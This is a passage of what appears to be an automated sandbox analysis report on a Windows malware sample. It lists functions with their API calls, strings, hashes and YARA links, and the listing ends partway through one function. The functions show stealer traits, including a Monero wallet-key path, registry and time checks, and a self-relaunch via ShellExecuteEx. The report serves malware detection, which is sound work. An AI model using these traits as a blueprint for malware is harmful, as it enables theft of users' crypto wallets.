                                • API String ID: 3031569214-898575020
                                • Opcode ID: 718f6d7d37589ecc2400dc372630c60603d01455cb2c9f839a62e3a1fab7f13b
                                • Instruction ID: ab6638a3309ee63afa9d2038c91db200654d11d7a2c718ff22523622701538c3
                                • Opcode Fuzzy Hash: 718f6d7d37589ecc2400dc372630c60603d01455cb2c9f839a62e3a1fab7f13b
                                • Instruction Fuzzy Hash: A641DE71D102189BDB18FFA0E896BEDBBB4AF14300F445129F106B7191DF746A8ACF92
                                Function 00E19E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                Download Yara Rule
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00E19F41
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
                                • Opcode ID: 9905ae47a1484c26e39c1d444e3aa1f9fb2a7eead4471d401129be2c82acc8bd
                                • Instruction ID: 323b158d2d9bd11f1cdd43b6f5d6ceaf9d628573dbb6159636239b29db17ca79
                                • Opcode Fuzzy Hash: 9905ae47a1484c26e39c1d444e3aa1f9fb2a7eead4471d401129be2c82acc8bd
                                • Instruction Fuzzy Hash: CA615E71A00258EBDB28EFA4DC96FEE77B5AF44300F449128F90A7F191EB706A45CB51
                                Function 00E240B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,008FD578,00000000,00020119,?), ref: 00E240F4
                                • RegQueryValueExA.ADVAPI32(?,008FDC10,00000000,00000000,00000000,000000FF), ref: 00E24118
                                • RegCloseKey.ADVAPI32(?), ref: 00E24122
                                • lstrcat.KERNEL32(?,00000000), ref: 00E24147
                                • lstrcat.KERNEL32(?,008FDC40), ref: 00E2415B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID:
                                • API String ID: 690832082-0
                                • Opcode ID: 05f6352f4798b654b6cce8bf2bf566caa763dfec468a27ff7eb3e344a68419e6
                                • Instruction ID: b1dec460a7dd03fb59377f7161765c15cb0885d0c3f95228228f4b6920712db1
                                • Opcode Fuzzy Hash: 05f6352f4798b654b6cce8bf2bf566caa763dfec468a27ff7eb3e344a68419e6
                                • Instruction Fuzzy Hash: B3418BB6D00208ABDB24EBB0EC46FFE777DAB8C300F004558B75657185EE795B888B91
                                Function 00E26920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 00E2696C
                                • sscanf.NTDLL ref: 00E26999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E269B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00E269C0
                                • ExitProcess.KERNEL32 ref: 00E269DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: 0dc4ddf3eff4b76df209f45ebf470c4a36546b7bfc15479b5b57d1ff1992e484
                                • Instruction ID: e18f1b51d169479e9d6a4fc9fa27b278b277b30c92905f3541c3ae8d5282b836
                                • Opcode Fuzzy Hash: 0dc4ddf3eff4b76df209f45ebf470c4a36546b7bfc15479b5b57d1ff1992e484
                                • Instruction Fuzzy Hash: E321CBB5D14218ABCF18EFE4E945AEEB7B5FF48300F04862AE506F3244EB355605CB65
                                Function 00E27E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E27E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E27E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,008EB818,00000000,00020119,?), ref: 00E27E5E
                                • RegQueryValueExA.ADVAPI32(?,008FD498,00000000,00000000,000000FF,000000FF), ref: 00E27E7F
                                • RegCloseKey.ADVAPI32(?), ref: 00E27E92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 14af687de20bd07328ce15d2bc86e1d94cfbdc16a555d39ab619862b64b7ad24
                                • Instruction ID: 89b04a772da749dc0196b545137e50d2efe2f51cccb4e71e2f6ec7e996dfdb69
                                • Opcode Fuzzy Hash: 14af687de20bd07328ce15d2bc86e1d94cfbdc16a555d39ab619862b64b7ad24
                                • Instruction Fuzzy Hash: F3115EB1A44309EBD710CF94ED4AFBBBBB8FB48B10F104259F646A7284D77958008BA1
                                Function 00E29260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                Download Yara Rule
                                APIs
                                • StrStrA.SHLWAPI(008FDAC0,?,?,?,00E2140C,?,008FDAC0,00000000), ref: 00E2926C
                                • lstrcpyn.KERNEL32(0105AB88,008FDAC0,008FDAC0,?,00E2140C,?,008FDAC0), ref: 00E29290
                                • lstrlen.KERNEL32(?,?,00E2140C,?,008FDAC0), ref: 00E292A7
                                • wsprintfA.USER32 ref: 00E292C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                • Opcode ID: dece9a35184b76651cea2bf5b7fa86d4d67649f2ebe1a42eb5a3c1a4571911f7
                                • Instruction ID: 29081cc5f76eb2815dd4671545488572308324a151548a134fe6bcb178aac576
                                • Opcode Fuzzy Hash: dece9a35184b76651cea2bf5b7fa86d4d67649f2ebe1a42eb5a3c1a4571911f7
                                • Instruction Fuzzy Hash: B8010075600208FFDB04DFDCD948DAE7BB9FB44354F108648F94997205C6359A40DBD0
                                Function 00E112A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E112B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E112BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E112D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E112F5
                                • RegCloseKey.ADVAPI32(?), ref: 00E112FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 88f3d69f95fd3b3e882dfa98b887bd7fe8847d7bca0aab314b813267287bcf45
                                • Instruction ID: 3067f4afb376bca5bcfcb7ccf8591d280224c621f58a50eb7737ebe2b55438b8
                                • Opcode Fuzzy Hash: 88f3d69f95fd3b3e882dfa98b887bd7fe8847d7bca0aab314b813267287bcf45
                                • Instruction Fuzzy Hash: 39011DB9A40308FBDB10DFE0DC49FAFB7B8EB48701F008259FA4597284D6759A018B50
                                Function 00E2C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: 61a2712b711ef45ebf45ab52dcae20ae51d3401d1d89ded08e5447e58c80bd85
                                • Instruction ID: 3d02b04973e65f549693172f537a47286c98a8f626cd3793b6df7f325c7fe8fa
                                • Opcode Fuzzy Hash: 61a2712b711ef45ebf45ab52dcae20ae51d3401d1d89ded08e5447e58c80bd85
                                • Instruction Fuzzy Hash: 1A41F6B11007AC5EDB258B24DC84FFF7BE89F45708F2454E8E98AA6182D2719A848F60
                                Function 00E26630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00E26663
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00E26726
                                • ExitProcess.KERNEL32 ref: 00E26755
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                • Opcode ID: e0c5d29b389f5efe7160f1fb19a05a545a3e94de340450a33084a9b62031943b
                                • Instruction ID: 79e6fec2e43b6c78c12bbafc0626bf21809a744bf83c11c14d18535cae570ec8
                                • Opcode Fuzzy Hash: e0c5d29b389f5efe7160f1fb19a05a545a3e94de340450a33084a9b62031943b
                                • Instruction Fuzzy Hash: FE311EB19012289BDB14EB50ED96FDE77B8AF48300F405199F20A77181DF756B88CF55
                                Function 00E287C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00E30E28,00000000,?), ref: 00E2882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E28836
                                • wsprintfA.USER32 ref: 00E28850
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: aa8ce3cb848f0ff586177aaab192cb396b2e1451a8f9537d560853b57a61cd04
                                • Instruction ID: 9a6d905635076df179164e4f083358b31c75ace1f6b01fffc5982fd027887bf7
                                • Opcode Fuzzy Hash: aa8ce3cb848f0ff586177aaab192cb396b2e1451a8f9537d560853b57a61cd04
                                • Instruction Fuzzy Hash: 6E21FEB1A44308EFDB14DF94DD49FAFBBB8FB48711F104219F605A7284C77A99018BA1
                                Function 00E28D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00E2951E,00000000), ref: 00E28D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E28D62
                                • wsprintfW.USER32 ref: 00E28D78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                • Associated: 00000000.00000002.1448984376.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000ECD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1448998514.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.000000000106E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.00000000012FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001304000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449146691.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449411479.0000000001313000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449524692.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1449537821.00000000014B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: 87dccda7d42cbe575fafcc23d4cf18bdea6f8e992040c15f50b7ddd1b176cda8
                                • Instruction ID: c966bbe6d5ad2d0d40bbf1074bb5480ae5382c9ff3b2ec2094e2c593e5e6698c
                                • Opcode Fuzzy Hash: 87dccda7d42cbe575fafcc23d4cf18bdea6f8e992040c15f50b7ddd1b176cda8
                                • Instruction Fuzzy Hash: B7E08670B40308FBC710DB94DC09E6A77B8EB04701F000154FD4997240D9765E008B51
                                Function 00E1A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
